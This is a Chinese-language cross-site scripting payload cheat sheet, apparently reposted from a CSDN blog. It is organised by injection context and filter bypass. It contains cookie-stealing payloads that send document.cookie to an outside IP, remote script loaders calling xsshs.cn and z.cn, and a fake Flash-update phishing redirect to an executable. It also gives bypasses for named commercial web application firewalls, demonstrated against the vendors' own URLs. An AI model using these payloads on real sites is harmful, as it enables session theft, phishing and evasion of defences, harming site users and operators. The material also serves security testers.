不同的情况不一样的xss payload:
弹窗
<script>alert(1)</script><script>prompt(2)</script><script>confirm(3)</script><script>console.log(3)</script><script>document.write(1)</script>
当不能弹窗的时候,可以用下面的payload来证明
<script>console.log(3)</script><script>document.write(1)</script>
引入外部js,可能需要短域名
<script src=//xsshs.cn></script><img src onerror=appendChild(createElement("script")).src="//xsshs.cn/aaaa"><img src onerror=jQuery.getScript("//xsshs.cn/aaaa")>
盗取cookie
<script>window.location.href="http://2.2.2.2/?msg="+escape(document.cookie)</script><script>document.body.appendChild(document.createElement("img")).src="http://2.2.2.2/?msg="+escape(document.cookie)</script>
结合弹窗和url跳转进行钓鱼
<script>alert("您的flash版本过低,请更新您的flash版本"); window.location.href ="https://www.flash.cn/cdm/latest/flashplayer_install_cn.exe"</script>当xss的触发位置在标签外
name=<script>alert(1)</script>标签内
name="><script>alert(1)</script>name=1" id=javascript:alert(1) autofocus onfocus=location=this.id xx="
在href=中
name=javascript:alert(1)在js中
name=</script><script>alert(1)</script>name=';alert(1)//name='-alert(1)-'name=';};alert(1);function a(){a='
在xml中
<?xml version="1.0"?><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'></a><?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(1);</html:script></html:html>
svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="100px" height="100px" viewBox="0 0 751 751" enable-background="new 0 0 751 751" xml:space="preserve"> <image id="image0" width="751" height="751" x="0" y="0"href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAu8AAALvCAIAAABa4bwGAAAAIGNIUk0AAHomAACAhAAA+gAAAIDo" /><script>alert(1)</script></svg>
当过滤了圆括号
<script>alert`1`</script><video src onerror=a="%2",location="javascript:aler"+"t"+a+"81"+a+"9"><video src onerror="javascript:window.onerror=alert;throw 1">
当过滤了空格
假设payload如下:
html><imgAAsrcAAonerrorBB=BBalertCC(1)DD</html>
A位置可填充/,/123/,%09,%0A,%0C,%0D,%20
B位置可填充%09,%0A,%0C,%0D,%20
C位置可填充%0B,如果加双引号,则可以填充/**/,%09,%0A ,%0C,%0D,%20
D位置可填充%09,%0A,%0C,%0D,%20,//,>
函数配合拼接
<video/src/onerror=top.alert(1);><video/src/onerror=top[`al`+`ert`](1);><video/src/onerror=self[`al`+`ert`](1);><video/src/onerror=parent[`al`+`ert`](1);><video/src/onerror=window[`al`+`ert`](1);><video/src/onerror=frames[`al`+`ert`](1);><video/src/onerror=content[`al`+`ert`](1);><body/onload=eval(alert(1));><body/onload=eval(`al`+`ert(1)`);><body/onload=open(alert(1));><body/onload=document.write(alert(1));><body/onload=setTimeout(alert(1));><body/onload=setInterval(alert(1));><body/onload=Set.constructor(alert(1))()><body/onload=Map.constructor(alert(1))()><body/onload=Array.constructor(alert(1))()><body/onload=WeakSet.constructor(alert(1))()><body/onload=constructor.constructor(alert(1))><video/src/onerror=[1].map(alert);><video/src/onerror=[1].map(eval('al'+'ert'));><video/src/onerror=[1].find(alert);><video/src/onerror=[1].every(alert);><video/src/onerror=[1].filter(alert);><video/src/onerror=[1].forEach(alert);><video/src/onerror=[1].findIndex(alert);>
赋值和拼接
<img src onerror=_=alert,_(1)><img src alt=al lang=ert onerror=top[alt+lang](1)><img src onerror=top[a='al',b='ev',b+a]('alert(1)')><img src onerror=['ale'+'rt'].map(top['ev'+'al'])[0]['valu'+'eOf']()(1)>
创建匿名函数
<video/src/onerror=Function('ale'+'rt(1)')();>伪协议
<svg/onload=javascript:alert(1)><iframe src=javascript:alert(1)><form action=javascript:alert(1)><input type=submit><a href=javascript:alert(123);>xss</a><iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=><object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=></object><embed src=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">
安全狗
http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=top[`al`%2B`ert`](1);>http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=appendChild(createElement("script")).src="//z.cn">
D盾
http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[`al`%2B`ert`](1);>http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>
云锁+奇安信waf
http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[`al`%2B`ert`](1);>http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>
一些新奇的xss playload
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"><BODY BACKGROUND="javascript:alert('XSS')"><input onfocus=alert(1) autofocus><h1 onmousemove="alert(1)">title</h1><select onfocus=alert(1) autofocus><iframe src="vbscript:msgbox(1)"></iframe><iframe src="javascript:alert(1)"></iframe><iframe src="vbscript:msgbox(1)"></iframe><iframe onload=alert(1)></iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe></iframe><iframe src="vbscript:msgbox(1)"></iframe></iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe><details open ontoggle=prompt(/xss/)><plaintext/onmouseover=prompt(1)>javascript://comment%250aalert(1)<img src=x onerror=confirm(1)><video><source onerror=alert(1)><audio src=x onerror="alert(1)"><body onload=alert(1)><body onscroll=alert(1);><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus><textarea onfocus=alert(1) autofocus>
版权声明:本文为CSDN博主「Redmaple925」的原创文章。原文链接:https://blog.csdn.net/songbai220/article/details/120667388
好文推荐
欢迎关注 系统安全运维
文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247508871&idx=2&sn=7bc3b44dd370be5e0e44b865d9adc4ec&chksm=c30870f7f47ff9e1ef7d9fd4fada7b344e9db5ad5850d039a166b2504674077bf041a462b74d#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh